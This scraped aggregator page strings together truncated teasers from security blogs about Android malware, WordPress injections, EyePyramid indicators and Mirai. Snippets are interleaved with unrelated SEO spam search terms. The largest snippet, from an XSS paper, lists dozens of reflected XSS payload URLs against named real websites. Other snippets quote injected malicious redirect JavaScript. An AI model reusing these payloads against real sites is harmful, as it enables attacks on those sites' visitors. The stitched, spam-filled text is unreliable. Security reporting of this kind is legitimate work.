Attack on Zygote: a new twist in the evolution of mobile threats
...money has been stolen; instead he presumes he hasn’t received the appropriate content and will then complain to the game developers. Filtration of incoming text messages The original dispatchPdus() is... more…Ztorg: money for infecting your smartphone
...dump had track.iappzone.net and app.adjust.com. adjust.com is a well-known “business intelligence platform”; the URLs that are used in malicious campaigns look like this: https://app.adjust.com/4f1lza?redirect=https://play.google.com/store/apps/details?id=com.game.puzzle.green&install_callback=http://track.iappzone.net… By analyzing these URLs we can... more…SPAM Hack Targets WordPress Core Install Directories
...www teer99 com teer code juwai teer barmateer wwwTEER ladrymbai teer common number shilling ter teershilong teercompany com shllong teer tree game mobile blog www teer game heck in teercode... more…Website Mesh Networks Distributing Malware
...if they are infected, leverage them. Don’t get caught with your pants down! Read more: Website Mesh Networks Distributing Malware Incoming search terms teer counter code samsung GT-C3312R photo eadting... more…Blog Comments – Analysing 100,000 Comments and Spammers
...field, they add a link to their own web site (which can increase their page rankings, visitors, etc). Example: [author] => Mary Jane [email] => info@fabfunapps.com [url] => http://fabfunapps.com [comment]... more…Conditional Malicious iFrame Targeting WordPress Web Sites
...one: sitylertudes.abbotaleweekendgetaway.com HTTP/1.1 302 Found Server: nginx Date: Sat, 13 Sep 2014 02:05:29 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 370 Connection: keep-alive Set-Cookie: ehihm=7MMcADE2AAIAAgBpphNU__9pphNUQAABAAAAaaYTVAA-; expires=Sun, 13-Sep-2015 02:05:29 GMT; path=/; domain=dolberop.chrisxp.us Location:... more…The “EyePyramid” attacks
...domains outlined by the police report follow: E-mail Addresses used for exfiltration gpool@hostpenta[.]com hanger@hostpenta[.]com hostpenta@hostpenta[.]com purge626@gmail[.]com tip848@gmail[.]com dude626@gmail[.]com octo424@gmail[.]com tim11235@gmail[.]com plars575@gmail[.]com Command-and-Control Servers eyepyramid[.]com hostpenta[.]com ayexisfitness[.]com enasrl[.]com eurecoove[.]com marashen[.]com millertaylor[.]com... more…Darkleech + Bitly.com = Insightful Statistics
...most interesting part that made this post possible. In January-February of 2014, Darkleech injects this code: .jasz8u72u { position:absolute; left:-1851px; top:-1816px} ... more…Website Malware – Mobile Redirect to BaDoink Porn App
...been modified. Now, it’s using javascript to force a redirection to a secondary landing page. This is the javascript code: top.location.replace("httx://www.1strateannuities.com/199c99c6d718c7b222eaa1a5fabd2467.php?s=http://ads.mobiteasy.com/mr/?id=SRV0102″); As you can see, it uses “top.location.replace” to send... more…New(ish) Mirai Spreader Poses New Risks
...this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly one that is not juvenile like the original Mirai operator set.... more…Uncovering the Inner Workings of EyePyramid
...accounts were stolen, with email accounts from the following domains being targeted: The domains being targeted @alice.it @aol.com @att.net @badoo.com @bellsouth.net @bluewin.ch @btinternet.com @comcast.net @cox.net @cyh.com.tr @earthlink.net @eim.ae @email.com @email.it... more…New GnatSpy Mobile Malware Family Discovered
...com.app.voice Voice 1b1bff4127c9f868f14bc8f2526358cfc9ff1259b7069ab116e7c52e43f2c669 com.messenger.hike Android Setting 1c0e3895f264ac51e185045aa2bf38102da5b340eb3c3c3f6aacb7476c294d62 com.app.updates Messenger Update 22078e0d00d6a0f0441b3777e6a418170e3a9e4cce8141f0da8af044fdc1e266 com.myapps.update Facebook Update 232807513c2d3e97bfcc64372d360bd9f7b6b782bd4083e91f09f2882818c0c5 com.myapps.update WhatsApp Update 313ae27ec66e533f7224d99c1a0c254272818d031456359d3dc85f02f21fd992 com.app.go Android Setting 377716c6a2b73c94d3307e9f2ea1a5b3774fa42df452c0867e7384eb45422e4f com.apps.voice Android Setting 3c604f5150ea1af994e7411e2816c277ff4f8a02b94d50b6cf4cc951430414bf com.appdev.update Android System... more…Cross site scripting (XSS) Research Paper By Aarshit Mittal and Harsha Vardhan Bopanna
...Vardhan Bopanna Incoming search terms xssxvideo banglaXSS shilong teer counte xxvidoesindia ludo king game-dedomil Holiwood xnxx16yaer teer prevous namber khanapara selong teer game chat downlod com TIRR SHILLONG JOWI KANAPARA... more…Cross site scripting (XSS) Research Paper By Aarshit Mittal and Harsha Vardhan Boppana
...they patch it) http://www.facebook.com/messages/?action=read&tid%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5c%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%20%3E%20%3E http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E http://svs.gsfc.nasa.gov/cgi-bin/advsearch.cgi?query=moon&req=search&year=%27%22–%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E&movie_type=All&movie_size=Any&image_type=All&image_size=Any http://ibnlive.in.com/videos/video_test_new.php?section=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.hpc.lsu.edu/systems/system.php?system=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.careersingear.com/search?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.honda.co.uk/search/?q=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E=&{} http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://pfn.sourceforge.net/index.php?opc=2%22%3E%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.porn8.com/search_result.php?search_id=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://blogs.news.com.au/technology/blog/index.php/?moo%3Cscript%3Ealert%28%27XSS%20Arrives%27%29;%3C/script%3E;%27 http://english.stanford.edu/graduate.php?type=placement&order_by=year_appointed&order=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://antares.stanford.edu/index.php/Site/Search?pagename=Site/Search&q=%22%20style=%27position:absolute;left:0;top:0;width:100%;height:100%;z-index:9999%27%20onmousemove=%27alert(21); http://id.post.yahoo.com/search/searchForum/p/%2526amp%253Bamp%253Bquot%253B%2526amp%253Bamp%253B%252362%253B%2B%2B%2526amp%253Bamp%253B%252339%253B%2526amp%253Bamp%253B%252339%253B%253B%2521–%2526amp%253Bamp%253Bquot%253B%2B%2B%2526amp%253Bamp%253B%252339%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253B%252392%253B%2526amp%253Bamp%253B%252339%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253Bquot%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F%2526amp%253Bamp%253B%252392%253B%2526amp%253Bamp%253Bquot%253B%253Balert%2528String.FromCharCode%252888%252C83%252C83%2529%2529%252F%252F–%2526amp%253Bamp%253B%252362%253B%2B%2526amp%253Bamp%253Bquot%253B%2526amp%253Bamp%253B%252362%253B%2526amp%253Bamp%253B%252339%253B%2526amp%253Bamp%253B%252362%253B%2B%2BXss%2Bby%2B%257E%2521White%2521%257E%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2526amp%253Bamp%253B%25238221%253B%2526amp%253Bamp%253B%252362%253B%2B%2B%2BGo%2BOver%2BMe/noRedirect/1 (PATCHED NOW) http://docs.ma3hd.net/search.php?search=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://money.cnn.com/search/index.html?sortBy=date&primaryType=mixed&source=money&query=%22%3E%3Ciframe+onload%3Dalert%28%2FXSS%2F%29%3E http://www.brita.net/pt/product_search.html?tx_indexedsearch%5Bsword%5D=%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&tx_indexedsearch%5B_sections%5D=0&tx_indexedsearch%5Bpointer%5D=0&tx_indexedsearch%5Bext%5D=0&tx_indexedsearch%5Blang%5D=0&tx_indexedsearch%5Bsubmit_button%5D=+&L=8&selection=product_search.html%3FL%3D8 http://tsastatus.net/search.php?q=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.the-west.net/?ref=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.pridefc.com/pride2005/index.php?mainpage=fighters_list&action=search&s_name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3E%3C%2FSCRIPT%3E–!%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E http://watsagri.nstl.gov.cn/SPT–QuickSearch.php?F_SearchString=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E http://www.mangoblog.org/generic.cfm?q=%3Cscript%3Ealert%28%27Namaste+by+Aarshit%27%29%3C%2Fscript%3E&event=googlesearch-search www.callcongressnow.com/index.cfm?action=alert(21) http://www.hotelplanner.com/FeaturedHotel.cfm?hid=92988&redirect=http%3A%2F%2Fwww.zplanet.in http://www.the-west.net/?ref=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3C%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E... more…Maikspy Spyware Poses as Adult Game, Targets Windows and Android Users
...Android users, and first posed as an adult game named after a popular U.S.-based adult film actress. Maikspy, which is an alias that combines the name of the adult film... more…Operation Ghoul: targeted attacks on industrial and engineering organizations
...(192.185.140.232), mail to eminfo@eminenture[.]com Both ozlercelikkapi[.]com and eminenture[.]com seem to belong to compromised organisations operating in manufacturing and technology services. Malware command center The malware connects to 192.169.82.86 to deliver... more…Kam dál?
- Microsoft Office CVE-2015-2503 Privilege Escalation Vulnerability
- Comment on Rooting Pokémons in Google Play Store by Arkadiy
- Black Hat speaker denied entry to US in another needless hit to security research
- Mac espionage trojan targets Uighur activists
- NSA whistleblower Edward Snowden says he’s a hero; do you agree? [POLL]
- Wading Through Tool Overload and Redundancy?
- Xen hypervisor faces third highly critical VM escape bug in 10 months
- Mozilla developing geolocation data service for public use
- AMD Announces Major Design Win With Sony PS4
- Blockchain 101: What Consumers Need to Know About the Technology